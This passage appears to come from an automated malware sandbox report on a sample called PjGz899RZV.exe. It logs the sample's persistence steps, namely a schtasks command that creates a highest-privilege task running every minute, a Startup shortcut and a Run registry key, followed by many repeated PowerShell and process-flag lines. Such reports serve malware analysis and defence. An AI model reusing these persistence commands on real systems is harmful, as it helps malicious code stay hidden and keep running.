            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "PjGz899RZV" /tr "C:\Users\user\AppData\Roaming\PjGz899RZV.exe"
            Source: C:\Users\user\Desktop\PjGz899RZV.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PjGz899RZV.lnkJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PjGz899RZV.lnkJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PjGz899RZVJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PjGz899RZVJump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Loading BitLocker PowerShell Module
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
